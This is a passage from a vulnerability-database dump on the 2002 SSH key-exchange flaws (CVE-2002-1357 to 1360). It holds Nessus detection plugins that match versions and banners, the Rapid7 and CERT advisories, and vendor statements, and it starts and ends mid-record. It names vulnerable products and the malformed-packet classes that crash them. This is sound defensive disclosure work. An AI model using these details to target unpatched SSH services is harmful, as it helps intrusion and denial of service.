Affected: 12.2\nif (check_release(version: version,\n patched: make_list(\"12.2(12b)\", \"12.2(13a)\"),\n oldest: \"12.2(1)\")) {\n report_extra = '\\nUpdate to ' + patch_update + ' or later\\n'; flag++;\n}\n# Affected: 12.2S\nif (check_release(version: version,\n patched: make_list(\"12.2(14)S\"),\n oldest: \"12.2(1)S\")) {\n report_extra = '\\nUpdate to ' + patch_update + ' or later\\n'; flag++;\n}\n# Affected: 12.2T\nif (check_release(version: version,\n patched: make_list(\"12.2(11)T3\", \"12.2(13)T1\") )) {\n report_extra = '\\nUpdate to ' + patch_update + ' or later\\n'; flag++;\n}\n\nif (get_kb_item(\"Host/local_checks_enabled\"))\n{\n\n if (flag)\n {\n flag = 0;\n buf = cisco_command_kb_item(\"Host/Cisco/Config/show_ip_ssh\", \"show ip ssh\");\n if (check_cisco_result(buf))\n {\n if (preg(pattern:\"SSH\\s+Enabled\", multiline:TRUE, string:buf)) { flag = 1; }\n } else if (cisco_needs_enable(buf)) { flag = 1; override = 1; }\n }\n}\n\n\n\nif (flag)\n{\n security_hole(port:0, extra:report_extra + cisco_caveat(override));\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:20:39", "description": "According to its banner, the remote SSH server is affected by one or more of the following vulnerabilities :\n\n - CVE-2002-1357 (incorrect length)\n\n - CVE-2002-1358 (lists with empty elements/empty strings)\n\n - CVE-2002-1359 (large packets and large fields)\n\n - CVE-2002-1360 (string fields with zeros)\n\nThe impact of successful exploitation of these vulnerabilities varies across products. In some cases, remote attackers will be able to execute arbitrary code with the privileges of the SSH process (usually root), although for the products currently tested, the maximum impact is believed to be just a denial of service.", "cvss3": {"score": null, "vector": null}, "published": "2002-12-20T00:00:00", "type": "nessus", "title": "SSH Multiple Remote Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2002-1357", "CVE-2002-1358", "CVE-2002-1359", "CVE-2002-1360"], "modified": "2018-11-15T00:00:00", "cpe": [], "id": "SSH_MULTIVULNS_16122002.NASL", "href": "https://www.tenable.com/plugins/nessus/11195", "sourceData": "#\n# This script was written by Paul Johnston of Westpoint Ltd <paul@westpoint.ltd.uk>\n#\n# See the Nessus Scripts License for details\n#\n\n# Changes by Tenable:\n# - Revised plugin title, family change (8/10/09)\n# - Updated to use compat.inc, added CVSS score (11/20/2009)\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11195);\n script_version(\"1.27\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\n\n script_cve_id(\"CVE-2002-1357\", \"CVE-2002-1358\", \"CVE-2002-1359\", \"CVE-2002-1360\");\n script_xref(name:\"CERT-CC\", value:\"CA-2002-36\");\n\n script_name(english:\"SSH Multiple Remote Vulnerabilities\");\n script_summary(english:\"SSH Multiple Vulnerabilities 16/12/2002\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"It may be possible to crash the SSH server on the remote host.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the remote SSH server is affected by one or\nmore of the following vulnerabilities :\n\n - CVE-2002-1357 (incorrect length)\n\n - CVE-2002-1358 (lists with empty elements/empty strings)\n\n - CVE-2002-1359 (large packets and large fields)\n\n - CVE-2002-1360 (string fields with zeros)\n\nThe impact of successful exploitation of these vulnerabilities varies\nacross products. In some cases, remote attackers will be able to\nexecute arbitrary code with the privileges of the SSH process (usually\nroot), although for the products currently tested, the maximum impact is\nbelieved to be just a denial of service.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.rapid7.com/advisories/R7-0009.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/vulnwatch/2002/q4/88\");\n script_set_attribute(attribute:\"solution\", value:\"Contact the vendor for an update.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PuTTY Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2002/12/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO); \n script_copyright(english:\"This script is Copyright (C) 2002-2018 Paul Johnston, Westpoint Ltd\");\n script_family(english:\"Misc.\");\n script_require_ports(\"Services/ssh\", 22);\n script_dependencie(\"ssh_detect.nasl\", \"os_fingerprint.nasl\");\n\n exit(0);\n}\n\n#\n# The script code starts here\n#\ninclude(\"backport.inc\");\nport = get_kb_item(\"Services/ssh\");\nif (!port) port = 22;\n\nbanner = get_kb_item(\"SSH/banner/\" + port);\nif ( ! banner ) exit(0);\n\n\nbanner = get_backport_banner(banner:banner);\n\n\n#\n# SSH-2.0-3.2.0 F-Secure SSH Windows NT Server\n# versions up to 3.1.* affected\n#\nif(ereg(pattern:\"^SSH-2.0-([12]\\..*|3\\.[01]\\..*) F-Secure SSH\", string:banner, icase:TRUE))\n{ \n security_warning(port);\n}\n\n#\n# SSH-2.0-3.2.0 SSH Secure Shell Windows NT Server\n# versions up to 3.1.* affected\n#\nif(ereg(pattern:\"^SSH-2.0-([12]\\..*|3\\.[01]\\..*) SSH Secure Shell\", string:banner, icase:TRUE))\n{ \n type = get_kb_item(\"Host/OS/Type\");\n if ( isnull(type) || type == \"embedded\" ) exit(0);\n security_warning(port);\n}\n\n#\n# SSH-1.99-Pragma SecureShell 3.0\n# versions up to 2.* affected\n#\nif(ereg(pattern:\"^SSH-1.99-Pragma SecureShell ([12]\\..*)\", string:banner, icase:TRUE))\n{ \n security_warning(port);\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:06", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n_______________________________________________________________________\r\n Rapid 7, Inc. Security Advisory\r\n\r\n Visit http://www.rapid7.com/ to download NeXpose(tm), our\r\n advanced vulnerability scanner. Linux and Windows 2000\r\n versions are available now!\r\n_______________________________________________________________________\r\n\r\nRapid 7 Advisory R7-0009\r\nVulnerabilities in SSH2 Implementations from Multiple Vendors\r\n\r\n Published: December 16, 2002\r\n Revision: 1.0\r\n http://www.rapid7.com/advisories/R7-0009.txt\r\n\r\n CERT: CA-2002-36\r\n http://www.cert.org/advisories/CA-2002-36.html\r\n\r\n CVE: Multiple CVE CANs assigned:\r\n o CAN-2002-1357 (incorrect length)\r\n o CAN-2002-1358 (lists with empty elements/empty strings)\r\n o CAN-2002-1359 (large packets and large fields)\r\n o CAN-2002-1360 (string fields with zeros)\r\n\r\n1. Affected system(s):\r\n\r\n KNOWN VULNERABLE:\r\n o F-Secure Corp. SSH servers and clients for UNIX\r\n v3.1.0 (build 11) and earlier\r\n o F-Secure Corp. SSH for Windows\r\n v5.2 and earlier\r\n o SSH Communications Security, Inc. SSH for Windows\r\n v3.2.2 and earlier\r\n o SSH Communications Security, Inc. SSH for UNIX\r\n v3.2.2 and earlier\r\n o FiSSH SSH client for Windows\r\n v1.0A and earlier\r\n o InterSoft Int'l, Inc. SecureNetTerm client for Windows\r\n v5.4.1 and earlier\r\n o NetComposite ShellGuard SSH client for Windows\r\n v3.4.6 and earlier\r\n o Pragma Systems, Inc. SecureShell SSH server for Windows\r\n v2 and earlier\r\n o PuTTY SSH client for Windows\r\n v0.53 and earlier (v0.53b not affected)\r\n o WinSCP SCP client for Windows\r\n v2.0.0 and earlier\r\n\r\n APPARENTLY NOT VULNERABLE:\r\n o BitVise WinSSHD server for Windows v3.05\r\n o LSH v1.5\r\n o OpenSSH v3.5 and earlier\r\n o TTSSH SSH Extension for TeraTerm Pro\r\n o VanDyke SecureCRT client v3.4.3 for Windows\r\n o VanDyke VShell server v1.2 for Windows\r\n\r\n UNKNOWN / NOT TESTED:\r\n o MacSSH\r\n o SSHv1 implementations (see {1})\r\n o SSHv2 enabled network appliances\r\n\r\n2. Summary\r\n\r\n SSH servers and clients from several vendors contain vulnerabilities\r\n that may allow denial-of-service attacks and/or arbitrary code\r\n execution. The vulnerabilities arise from various deficiencies in\r\n the greeting and key-exchange-initialization phases of the SSHv2\r\n transport layer.\r\n\r\n3. Vendor status and information\r\n\r\n F-Secure Corporation\r\n http://www.f-secure.com\r\n\r\n Vendor has been notified. Release information is unknown at\r\n this time. F-Secure has characterized this issue as not\r\n exploitable.\r\n\r\n FiSSH\r\n http://pgpdist.mit.edu/FiSSH/index.html\r\n\r\n Vendor has been notified. Release information is unknown at\r\n this time.\r\n\r\n NetComposite (ShellGuard)\r\n http://www.shellguard.com\r\n\r\n Vendor has been notified. Release information is unknown at\r\n this time.\r\n\r\n Pragma Systems, Inc.\r\n http://www.pragmasys.com\r\n\r\n Vendor has been notified. The fixed version is SecureShell\r\n v3.0, which was released on November 25 2002.\r\n\r\n PuTTY\r\n http://www.chiark.greenend.org.uk/~sgtatham/putty/\r\n\r\n Vendor has been notified. The fixed version is PuTTY v0.53b,\r\n which was released on November 12, 2002.\r\n\r\n SSH Communications Security, Inc.\r\n http://www.ssh.com\r\n\r\n Vendor has been notified. Release information is unknown at\r\n this time. SSH, Inc. has characterized this issue as not\r\n exploitable.\r\n\r\n SecureNetTerm (InterSoft International, Inc.)\r\n http://www.securenetterm.com\r\n\r\n Vendor notified. The fixed version is SecureNetTerm v5.4.2,\r\n released on November 14 2002.\r\n\r\n WinSCP2\r\n http://winscp.vse.cz/eng/\r\n\r\n Vendor has been notified. Release information is unknown at\r\n this time.\r\n\r\n4. Solution\r\n\r\n No solutions available yet.\r\n\r\n5. Detailed analysis\r\n\r\n To study the correctness and security of SSH server and client\r\n implementations {2}, the security research team at Rapid 7, Inc.\r\n has designed the SSHredder SSH protocol test suite containing\r\n hundreds of sample SSH packets. These invalid and/or atypical\r\n SSH packets focus on the greeting and KEXINIT (key exchange\r\n initialization) phases of SSH connections.\r\n\r\n We then applied the SSHredder suite to some popular SSH servers\r\n and clients, observing their behavior when presented with a\r\n range of different input. Several implementation errors were\r\n discovered, most of which involve memory access violations.\r\n While the impact is different for each product tested, some of\r\n these errors were easily exploitable, allowing the attacker to\r\n overwrite the stack pointer with arbitrary data.\r\n\r\n In most cases, only the most current versions of the applications\r\n were tested. Vendors listed as "Apparently NOT VULNERABLE" are\r\n encouraged to run the tests against older versions of their\r\n applications.\r\n\r\n The SSHredder test suite is now available for download from\r\n Rapid 7's web site ( http://www.rapid7.com ). A pre-release\r\n version of SSHredder was provided to SSH vendors for testing\r\n prior to public disclosure. SSHredder has been released under\r\n the BSD license.\r\n\r\n The test cases combine several test groups of similarly\r\n structured data:\r\n\r\n o Invalid and/or incorrect SSH packet lengths (including\r\n zero, very small positive, very large positive, and\r\n negative).\r\n\r\n o Invalid and/or incorrect string lengths. These were applied\r\n to the greeting line(s), plus all the SSH strings in the\r\n KEXINIT packets).\r\n\r\n o Invalid and/or incorrect SSH padding and padding lengths.\r\n\r\n o Invalid and/or incorrect strings, including embedded ASCII\r\n NULs, embedded percent format specifiers, very short, and\r\n very long strings. This test group was applied to the\r\n greeting line(s), plus all the SSH strings in the KEXINIT\r\n packets).\r\n\r\n o Invalid algorithm lists. In addition to the existing string\r\n tests, invalid encryption, compression, and MAC algorithm names\r\n were used, including invalid algorithm domain qualifiers;\r\n invalid algorithm lists were created by manipulating the\r\n separating commas.\r\n\r\n The individual tests in each group were combined systematically to\r\n produce a test suite of 666 packets. A full permutation of every\r\n test in each test group would have yielded a test suite that is too\r\n large to distribute, so a representative sample of packets was\r\n chosen from each group.\r\n\r\n Please note that greeting and KEXINIT are only the first and second\r\n phases of SSH connections. A full test suite for every SSH\r\n protocol message could potentially reveal other latent\r\n vulnerabilities.\r\n\r\n6. Notes\r\n\r\n [1] While SSHv1 has no KEXINIT phase, many of these test cases\r\n could affect both SSHv1 and SSHv2 in a generic way). SSHv1\r\n implementations were not tested.\r\n\r\n [2] The SSH protocol is described in several IETF drafts, which can be\r\n found at http://www.ietf.org/ids.by.wg/secsh.html .\r\n\r\n7. Contact Information\r\n\r\n Rapid 7 Security Advisories\r\n Email: advisory@rapid7.com\r\n Web: http://www.rapid7.com/\r\n Phone: +1 (212) 558-8700\r\n\r\n8. Disclaimer and Copyright\r\n\r\n Rapid 7, Inc. is not responsible for the misuse of the information\r\n provided in our security advisories. These advisories are a service\r\n to the professional security community. There are NO WARRANTIES\r\n with regard to this information. Any application or distribution of\r\n this information constitutes acceptance AS IS, at the user's own\r\n risk. This information is subject to change without notice.\r\n\r\n This advisory Copyright (C) 2002 Rapid 7, Inc. Permission is\r\n hereby granted to redistribute this advisory, providing that no\r\n changes are made and that the copyright notices and disclaimers\r\n remain intact.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.7 (OpenBSD)\r\n\r\niD8DBQE9/a5kcL76DCfug6wRAoIdAJ0Xg1HUeXQk5aNzBaKVcS4XP9rlpACguQk6\r\nG2ihG+Zr3V/VE/1C21p4yf4=\r\n=iqCp\r\n-----END PGP SIGNATURE-----\r\n\r\n==============================\r\nRapid 7 Security Research Team\r\nEmail: advisory@rapid7.com\r\nWeb: http://www.rapid7.com/\r\nPhone: +1 (212) 558-8700\r\nPGP: http://www.rapid7.com/advisories/R7-PKey2002.txt\r\n==============================\r\n\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2002-12-17T00:00:00", "title": "R7-0009: Vulnerabilities in SSH2 Implementations from Multiple Vendors", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2002-1359", "CVE-2002-1358", "CVE-2002-1357", "CVE-2002-1360"], "modified": "2002-12-17T00:00:00", "id": "SECURITYVULNS:DOC:3882", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:3882", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:06", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\n\r\n\r\nCERT Advisory CA-2002-36 Multiple Vulnerabilities in SSH Implementations\r\n\r\n Original issue date: December 16, 2002\r\n Last revised: --\r\n Source: CERT/CC\r\n\r\n A complete revision history is at the end of this file.\r\n\r\n\r\nSystems Affected\r\n\r\n * Secure shell (SSH) protocol implementations in SSH clients and\r\n servers from multiple vendors\r\n\r\n\r\nOverview\r\n\r\n Multiple vendors' implementations of the secure shell (SSH) transport\r\n layer protocol contain vulnerabilities that could allow a remote\r\n attacker to execute arbitrary code with the privileges of the SSH\r\n process or cause a denial of service. The vulnerabilities affect SSH\r\n clients and servers, and they occur before user authentication takes\r\n place.\r\n\r\n\r\nI. Description\r\n\r\n The SSH protocol enables a secure communications channel from a client\r\n to a server. From the IETF draft SSH Transport Layer Protocol:\r\n\r\n The SSH transport layer is a secure low level transport protocol.\r\n It provides strong encryption, cryptographic host authentication,\r\n and integrity protection.... Key exchange method, public key\r\n algorithm, symmetric encryption algorithm, message authentication\r\n algorithm, and hash algorithm are all negotiated. \r\n\r\n Rapid7 has developed a suite (SSHredder) of test cases that examine\r\n the connection initialization, key exchange, and negotiation phase\r\n (KEX, KEXINIT) of the SSH transport layer protocol. The suite tests\r\n the way an SSH transport layer implementation handles invalid or\r\n incorrect packet and string lengths, padding and padding length,\r\n malformed strings, and invalid algorithms.\r\n\r\n The test suite has demonstrated a number of vulnerabilities in\r\n different vendors' SSH products. These vulnerabilities include buffer\r\n overflows, and they occur before any user authentication takes place.\r\n SSHredder was primarily designed to test key exchange and other\r\n processes that are specific to version 2 of the SSH protocol; however,\r\n certain classes of tests are also applicable to version 1.\r\n\r\n Further information about this set of vulnerabilities may be found in\r\n Vulnerability Note VU#389665.\r\n\r\n Rapid7 has published a detailed advisory (R7-0009) and the SSHredder\r\n test suite.\r\n\r\n Common Vulnerabilities and Exposures (CVE) has assigned the following\r\n candidate numbers for several classes of tests performed by SSHredder:\r\n\r\n * CAN-2002-1357 - incorrect field lengths\r\n * CAN-2002-1358 - lists with empty elements or multiple separators\r\n * CAN-2002-1359 - "classic" buffer overflows\r\n * CAN-2002-1360 - null characters in strings\r\n\r\n\r\nII. Impact\r\n\r\n The impact will vary for different vulnerabilities and products, but\r\n in severe cases, remote attackers could execute arbitrary code with\r\n the privileges of the SSH process. Both SSH servers and clients are\r\n affected, since both implement the SSH transport layer protocol. On\r\n Microsoft Windows systems, SSH servers commonly run with SYSTEM\r\n privileges, and on UNIX systems, SSH daemons typically run with root\r\n privileges. In the case of SSH clients, any attacker-supplied code\r\n would run with the privileges of the user who started the client\r\n program, with the possible exception of SSH clients that may be\r\n configured with an effective user ID of root (setuid root). Attackers\r\n could also crash a vulnerable SSH process, causing a denial of\r\n service.\r\n\r\n\r\nIII. Solution\r\n\r\nApply a patch or upgrade\r\n\r\n Apply the appropriate patch or upgrade as specified by your vendor.\r\n See Appendix A below and the Systems Affected section of VU#389665 for\r\n specific information.\r\n\r\nRestrict access\r\n\r\n Limit access to SSH servers to trusted hosts and networks using\r\n firewalls or other packet-filtering systems. Some SSH servers may have\r\n the ability to restrict access based on IP addresses, or similar\r\n effects may be achieved by using TCP wrappers or other related\r\n technology.\r\n\r\n SSH clients can reduce the risk of attacks by only connecting to\r\n trusted servers by IP address.\r\n\r\n While these workarounds will not prevent exploitation of these\r\n vulnerabilities, they will make attacks somewhat more difficult, in\r\n part by limiting the number of potential sources of attacks.\r\n\r\n\r\nAppendix A. Vendor Information\r\n\r\n This appendix contains information provided by vendors. When vendors\r\n report new information, this section is updated and the changes are\r\n noted in the revision history. If a vendor is not listed below, we\r\n have not received their comments. The Systems Affected section of\r\n VU#389665 contains additional vendor status information.\r\n\r\nCisco Systems, Inc.\r\n\r\n The official statement regarding this is that we are not\r\n vulnerable.\r\n\r\nCray Inc.\r\n\r\n Cray Inc. supports the OpenSSH product through their Cray Open\r\n Software (COS) package. COS 3.3, available the end of December\r\n 2002, is not vulnerable. If a site is concerned, they can contact\r\n their local Cray representive to obtain an early copy of the\r\n OpenSSH contained in COS 3.3.\r\n\r\nF-Secure\r\n\r\n F-Secure SSH products are not exploitable via these attacks. While\r\n F-Secure SSH versions 3.1.0 build 11 and earlier crash on these\r\n malicious packets, we did not find ways to exploit this to gain\r\n unauthorized access or to run arbitrary code. Furthermore, the\r\n crash occurs in a forked process so the denial of service attacks\r\n are not possible.\r\n\r\nFujitsu\r\n\r\n Fujitsu's UXP/V OS is not vulnerable because it does not support\r\n SSH.\r\n\r\nIBM\r\n\r\n IBM's AIX is not vulnerabible to the issues discussed in CERT\r\n Vulnerability Note VU#389665.\r\n\r\nlsh\r\n\r\n I've now tried the testsuite with the latest stable release of lsh,\r\n lsh-1.4.2. Both the client and the server seem NOT VULNERABLE.\r\n\r\nNetScreen Technologies Inc.\r\n\r\n Tested latest versions. Not Vulnerable.\r\n\r\nOpenSSH\r\n\r\n From my testing it seems that the current version of OpenSSH (3.5)\r\n is not vulnerable to these problems, and some limited testing shows\r\n that no version of OpenSSH is vulnerable.\r\n\r\nPragma Systems, Inc.\r\n\r\n December 16, 2002\r\n\r\n Rapid 7 and CERT Coordination Center Vulnerability report VU#389665\r\n\r\n Pragma Systems Inc. of Austin, Texas, USA, was notified regarding a\r\n possible vulnerability with Version 2.0 of Pragma SecureShell.\r\n Pragma Systems tested Pragma SecureShell 2.0 and the upcoming new\r\n Version 3.0, and found that the attacks did cause a memory access\r\n protection fault on Microsoft platforms.\r\n\r\n After research, Pragma Systems corrected the problem. The\r\n correction of the problem leads us to believe that any attack would\r\n not cause a Denial of Service, or the ability of random code to run\r\n on the server.\r\n\r\n The problem is corrected in Pragma SecureShell Version 3.0. Any\r\n customers with concerns regarding this vulnerability report should\r\n contact Pragma Systems, Inc at support@pragmasys.com for\r\n information on obtaining an upgrade free of charge. Pragma's web\r\n site is located at www.pragmasys.com and the company can be reached\r\n at 1-512-219-7270.\r\n\r\nPuTTY\r\n\r\n PuTTY 0.53b addresses vulnerabilities discovered by SSHredder.\r\n\r\nSSH Communications Security\r\n\r\n SSH Secure Shell products are not exploitable via these attacks.\r\n\r\n\r\nAppendix B. References\r\n\r\n * CERT/CC Vulnerability Note: VU#389665 -\r\n http://www.kb.cert.org/vuls/id/389665\r\n * Rapid 7 Advisory: R7-0009 -\r\n http://www.rapid7.com/advisories/R7-0009.txt\r\n * Rapid 7 SSHredder test suite -\r\n http://www.rapid7.com/perl/DownloadRequest.pl?PackageChoice=666\r\n * IETF Draft: SSH Transport Layer Protocol -\r\n http://www.ietf.org/internet-drafts/draft-ietf-secsh-transport-15.\r\n txt\r\n * IETF Draft: SSH Protocol Architecture -\r\n http://www.ietf.org/internet-drafts/draft-ietf-secsh-architecture-\r\n 13.txt\r\n * Privilege Separated OpenSSH -\r\n http://www.citi.umich.edu/u/provos/ssh/privsep.html\r\n\r\n _________________________________________________________________\r\n\r\n The CERT Coordination Center thanks Rapid7 for researching and\r\n reporting these vulnerabilities.\r\n _________________________________________________________________\r\n\r\n Author: Art Manion.\r\n ______________________________________________________________________\r\n\r\n This document is available from:\r\n http://www.cert.org/advisories/CA-2002-36.html\r\n ______________________________________________________________________\r\n\r\n\r\nCERT/CC Contact Information\r\n\r\n Email: cert@cert.org\r\n Phone: +1 412-268-7090 (24-hour hotline)\r\n Fax: +1 412-268-6989\r\n Postal address:\r\n CERT Coordination Center\r\n Software Engineering Institute\r\n Carnegie Mellon University\r\n Pittsburgh PA 15213-3890\r\n U.S.A.\r\n\r\n CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) /\r\n EDT(GMT-4) Monday through Friday; they are on call for emergencies\r\n during other hours, on U.S. holidays, and on weekends.\r\n\r\nUsing encryption\r\n\r\n We strongly urge you to encrypt sensitive information sent by email.\r\n Our public PGP key is available from\r\n http://www.cert.org/CERT_PGP.key\r\n\r\n If you prefer to use DES, please call the CERT hotline for more\r\n information.\r\n\r\nGetting security information\r\n\r\n CERT publications and other security information are available from\r\n our web site\r\n http://www.cert.org/\r\n\r\n To subscribe to the CERT mailing list for advisories and bulletins,\r\n send email to majordomo@cert.org. Please include in the body of your\r\n message\r\n\r\n subscribe cert-advisory\r\n\r\n * "CERT" and "CERT Coordination Center" are registered in the U.S.\r\n Patent and Trademark Office.\r\n ______________________________________________________________________\r\n\r\n NO WARRANTY\r\n Any material furnished by Carnegie Mellon University and the Software\r\n Engineering Institute is furnished on an "as is" basis. Carnegie\r\n Mellon University makes no warranties of any kind, either expressed or\r\n implied as to any matter including, but not limited to, warranty of\r\n fitness for a particular purpose or merchantability, exclusivity or\r\n results obtained from use of the material. Carnegie Mellon University\r\n does not make any warranty of any kind with respect to freedom from\r\n patent, trademark, or copyright infringement.\r\n _________________________________________________________________\r\n\r\n Conditions for use, disclaimers, and sponsorship information\r\n\r\n Copyright 2002 Carnegie Mellon University.\r\n\r\n Revision History\r\n\r\n December 16, 2002: Initial release\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 6.5.8\r\n\r\niQCVAwUBPf4qimjtSoHZUTs5AQEGbAQAiJcA+QFf2mOElaPIFwEmSRC83xlKifq/\r\nPlmaGbUx2UnwTIi8s2ETF8KjlfQjjgO20B4ms1MMaJ/heyxklOgpeBOQ2mpa2Tnd\r\nyIY7sxpBuRjF1qS6yQ8/OrcsSqVxdxZWkPLAypV11WcJlMmSxxLdKi5t86EsWic3\r\nxazIo8XEipc=\r\n=Nj+0\r\n-----END PGP SIGNATURE-----", "edition": 1, "cvss3": {}, "published": "2002-12-17T00:00:00", "title": "CERT Advisory CA-2002-36 Multiple Vulnerabilities in SSH Implementations", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2002-1359", "CVE-2002-1358", "CVE-2002-1357", "CVE-2002-1360"], "modified": "2002-12-17T00:00:00", "id": "SECURITYVULNS:DOC:3883", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:3883", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2021-09-28T17:53:41", "description": "### Overview\n\nSecure shell (SSH) transport layer protocol implementations from different vendors contain multiple vulnerabilities in code that handles key exchange and initialization. Both SSH servers and clients are affected. A remote attacker could execute arbitrary code with the privileges of the SSH process or cause a denial of service.\n\n### Description\n\nFrom the IETF draft [_SSH Transport Layer Protocol_](<http://www.ietf.org/internet-drafts/draft-ietf-secsh-transport-15.txt>):\n\n`SSH is a protocol for secure remote login and other secure network services over an insecure network.` \n \n`This document describes the SSH transport layer protocol which typically runs on top of TCP/IP. The protocol can be used as a basis for a number of secure network services. It provides strong encryption, server authentication, and integrity protection. It may also provide compression.` \n \n`Key exchange method, public key algorithm, symmetric encryption algorithm, message authentication algorithm, and hash algorithm are all negotiated.` \nRapid7 has developed a suite of test cases (SSHredder) that examine the connection initialization, key exchange, and negotiation phase (KEX, KEXINIT) of the SSH transport layer protocol. The suite tests the way an SSH transport layer implementation handles invalid or incorrect packet and string lengths, padding and padding length, malformed strings, and invalid algorithms. \n \nThe test suite has demonstrated a number of vulnerabilities in different vendors' SSH products. These vulnerabilities include buffer overflows, and they occur before user authentication takes place. Common Vulnerabilities and Exposures ([CVE](<http://cve.mitre.org/>)) has assigned the following candidate numbers for several classes of tests performed by SSHredder: \n \n[CAN-2002-1357](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1357>): incorrect length fields, i.e. specified length field does not match the actual length of the input \n \n[CAN-2002-1358](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1358>): lists with empty elements or multiple separators \n \n[CAN-2002-1359](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1359>): \"classic\" buffer overflows (length field, if present, is consistent with the actual length of buffer) \n \n[CAN-2002-1360](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1360>): null characters in strings (which trigger conflicts between delimiter-based and length-based strings) \nRapid7 has posted an advisory ([R7-0009](<http://www.rapid7.com/advisories/R7-0009.txt>)) and the [SSHredder](<http://www.rapid7.com/perl/DownloadRequest.pl?PackageChoice=666>) test suite. \n \n--- \n \n### Impact\n\nThe impact will vary for different vulnerabilities, but in some cases remote attackers could execute arbitrary code with the privileges of the SSH process. Both SSH servers and clients are affected. On Windows systems, SSH servers commonly run with SYSTEM privileges. SSH daemons on UNIX systems typically run with root privileges. In the case of SSH clients, any attacker-supplied code would run with the privileges of the user who started the client program. Additional privileges may be afforded to an attacker when the SSH client is configured to run with an effective user ID (setuid/setgid) of root. Attackers could also crash a vulnerable SSH process, causing a denial of service. \nWhile OpenSSH does not appear to be affected, it is worth noting that [privilege separation](<http://www.citi.umich.edu/u/provos/ssh/privsep.html>) would greatly reduce the impact of arbitrary code execution during the KEXINIT phase. \n \n--- \n \n### Solution\n\n \n**Upgrade or Apply Patch** \n \nUpgrade or apply a patch as specified by your vendor. \n \n--- \n \n \n**Restrict Access** \n \nUntil patches or upgrades are available, it may be possible to limit access to vulnerable SSH clients and servers using the built-in facilities of some SSH implementations, firewalls, packet-filters, [TCP Wrappers](<http://ftp.porcupine.org/pub/security/#software>), or other similar technology. Note that this workaround will not prevent exploitation of these vulnerabilities, it will only limit the number of potential sources of attacks. \n \n**Do Not Trust DNS** \n \nSSH clients can reduce the risk of attacks by only connecting to trusted servers by IP address. Again, this will not prevent attacks, but it will remove the ability of an attacker to redirect a client using DNS cache poisoning or by compromising a DNS server. \n \n--- \n \n### Vendor Information\n\n389665\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Alcatel __ Affected\n\nNotified: December 06, 2002 Updated: May 05, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nFollowing CERT advisory CA-2002-36 on security vulnerabilities in the SSH implementations, Alcatel has conducted an immediate assessment to determine any impact this may have on our portfolio. A first analysis showed that various Alcatel products were affected: namely the 6600, 7000 and 8000 OmniSwitches running AOS 5.1.3 and for which corrections had been made available to customers. This issue has now been fixed both in a AOS 5.1.3 maintenance release and in AOS 5.1.4. The security of our customers' networks is of highest priority for Alcatel. Therefore we continue to test our product portfolio against potential SSH security vulnerabilities and will provide updates if necessary.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Cisco Systems Inc. __ Affected\n\nNotified: October 19, 2002 Updated: December 20, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nCisco Systems has several products that are vulnerable to the attacks posed by the SSHredder test suite. Complete details are available at <http://www.cisco.com/warp/public/707/ssh-packet-suite-vuln.shtml>.\n\nBased on initial testing and evaluation of this vulnerability, earlier versions of this advisory listed Cisco Systems as \"Not Vulnerable.\" Upon additional internal testing it was determined that some Cisco products were indeed vulnerable.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have 